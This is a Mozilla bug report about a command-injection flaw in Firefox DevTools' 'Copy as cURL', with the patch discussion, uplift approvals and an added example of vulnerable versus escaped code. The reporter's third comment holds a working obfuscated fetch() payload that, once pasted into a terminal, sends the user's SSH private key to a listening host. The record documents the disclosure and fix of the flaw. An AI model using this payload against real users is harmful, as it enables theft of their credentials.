'Copy As Curl' in the network panel of the devtools does not escape the HTTP method properly, leading to local code execution
Categories: DevTools :: Netmonitor, defect, P2
Tracking: firefox-esr68 74+ fixed, firefox73 wontfix, firefox74+ fixed, firefox75+ fixed
People: Reporter: pere.jobs, Assigned: Honza
Keywords: reporter-external, sec-moderate
Whiteboard: [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main74+][adv-esr68.6+]
Attachments (3 files, 1 obsolete file):
- 57 bytes, text/html
- 47 bytes, text/x-phabricator-request (RyanVM: approval-mozilla-beta+, approval-mozilla-esr68+)
- 443 bytes, text/plain
Firefox devtools have a 'network' panel, where all the requests made by the current webpage are listed.
In this panel, the user can right-click on a query, and then select 'Copy As cURL'. The user is then expected to paste what he just copied into a terminal.
The issue is that the HTTP method of the request, which is controlled by the potentially malicious webpage, is not escaped when the curl command is formed.
As an example, the following JavaScript snippet will make a problematic request:
fetch('', {method: '|evilcommand|'});
When this snippet is run, and then a naive user uses 'Copy as cURL' on the generated request and then pastes it into a terminal, evilcommand is executed.
Note: an HTTP verb cannot contain a space (so one can not launch evilcommand with arguments), but the following characters are allowed, making it possible to construct complex malicious payloads: ` ' . * $ & | ~.
Comment 1 • 5 years ago (Reporter)
The problem seems to come from this line, where the HTTP method is added to the command without any escaping:
https://dxr.mozilla.org/mozilla-central/source/devtools/client/shared/curl.js#122
Comment 2 • 5 years ago
Honza, can you take a look?
Comment 3 • 5 years ago (Reporter)
Here is an example exploit:
fetch('/', {method: '&echo$IFS`echo`6375726c206c6f63616c686f73743a39393939202d2d64617461202224283c207e2f2e7373682f69645f72736129220a|xxd$IFS`echo`-r$IFS`echo`-p|sh&'});
When the generated request is copied as cURL and pasted to a terminal, the user's ssh private key is sent to a server (localhost:9999 in this example).
Comment 4 • 5 years ago (Assignee)
Comment 5 • 5 years ago (Reporter)
Hello! Anything new? Do you need help making a patch?
This should be as simple as replacing
command.push(data.method);
with
command.push(escapeString(data.method));
in https://dxr.mozilla.org/mozilla-central/source/devtools/client/shared/curl.js#122
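An added illustration of the bug described in the report and of the one-line fix proposed in this comment (example code, not Firefox's devtools/client/shared/curl.js): a minimal "Copy as cURL" builder in its vulnerable form beside the escaped form, exercised with the '|evilcommand|' method from the report's fetch() snippet. The helper escapePosix stands in for the page's escapeString; buildCurl and the sample request are assumptions made for this example.

```javascript
// Added example, not Firefox's curl.js: a minimal "Copy as cURL" builder
// in its vulnerable and fixed forms.

// POSIX single-quote escaping (assumed helper standing in for the page's
// escapeString): wrap in '...' and turn each embedded ' into '\''.
// Inside single quotes the shell treats every other character literally,
// so ` ' . * $ & | ~ in a page-controlled value cannot reach the shell.
// Windows command shells need different quoting; this covers POSIX only.
function escapePosix(str) {
  return "'" + String(str).replace(/'/g, "'\\''") + "'";
}

// Shared builder. Only the handling of the HTTP method differs between the
// two forms; the URL and headers are escaped in both.
function buildCurl(data, escapeMethod) {
  const command = ["curl", escapePosix(data.url), "-X"];
  // The method is page-controlled (fetch(url, {method: ...})).
  command.push(escapeMethod ? escapePosix(data.method) : data.method);
  for (const [name, value] of Object.entries(data.headers || {})) {
    command.push("-H", escapePosix(`${name}: ${value}`));
  }
  return command.join(" ");
}

// Vulnerable form (the bug): the raw method is pushed into the command,
// so a pasted command line contains unquoted shell metacharacters.
function buildCurlVulnerable(data) {
  return buildCurl(data, false);
}

// Fixed form (the one-line change suggested in comment 5): the method is
// escaped like every other page-controlled value.
function buildCurlFixed(data) {
  return buildCurl(data, true);
}

// Constructed sample request using the method from the report's snippet.
const sample = {
  url: "https://example.test/",
  method: "|evilcommand|",
  headers: { Accept: "*/*" },
};

console.log(buildCurlVulnerable(sample)); // -X |evilcommand| : shell syntax
console.log(buildCurlFixed(sample));      // -X '|evilcommand|' : literal
```

Pasting the fixed output into a shell makes curl send the odd verb to the server and nothing else; the vulnerable output is parsed by the shell as a pipeline.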
Comment 6 • 5 years ago (Reporter)
Also, this bug still has the status UNCONFIRMED. Were you able to reproduce it? Do you need more information about how to reproduce it?
Comment 7 • 5 years ago
I think you've found the patch since your last comments...
As for the status field, I think the automatic update just missed it...
Comment 8 • 5 years ago
https://hg.mozilla.org/integration/autoland/rev/4e6cf4c65e2153dd212512aae8b43eea39ce4f36
https://hg.mozilla.org/mozilla-central/rev/4e6cf4c65e21
Comment 9 • 5 years ago
Please nominate this for Beta and ESR68 approval when you get a chance.
Comment 10 • 5 years ago (Assignee)
Comment on attachment 9121841 [details]
Escape method argument
Beta/Release Uplift Approval Request
- User impact if declined: Potential risk of evaluating an evil script when user uses 'Copy as cURL' on HTTP request and pastes it into a terminal.
- Is this code covered by automated tests?: No
- Has the fix been verified in Nightly?: Yes
- Needs manual test from QE?: No
- If yes, steps to reproduce:
- List of other uplifts needed: None
- Risk to taking this patch: Low
- Why is the change risky/not risky? (and alternatives if risky): Small patch, only impacts web developers (DevTools)
- String changes made/needed:
Comment 11 • 5 years ago (Assignee)
Comment on attachment 9121841 [details]
Escape method argument
ESR Uplift Approval Request
- If this is not a sec:{high,crit} bug, please state case for ESR consideration: Potential risk of evaluating an evil script when user uses 'Copy as cURL' on HTTP request and pastes it into a terminal.
- User impact if declined:
- Fix Landed on Version:
- Risk to taking this patch: Low
- Why is the change risky/not risky? (and alternatives if risky): Small patch, only affects web developers (DevTools)
- String or UUID changes made by this patch:
Comment 12 • 5 years ago
Comment on attachment 9121841 [details]
Escape method argument
Fixes a devtools sec bug. Approved for 74.0b4 and 68.6esr.
Comment 13 • 5 years ago
uplift
https://hg.mozilla.org/releases/mozilla-beta/rev/0f94967140ce
https://hg.mozilla.org/releases/mozilla-esr68/rev/5da0d4b486f8
Comment 14 • 5 years ago
Comment 15 • 5 years ago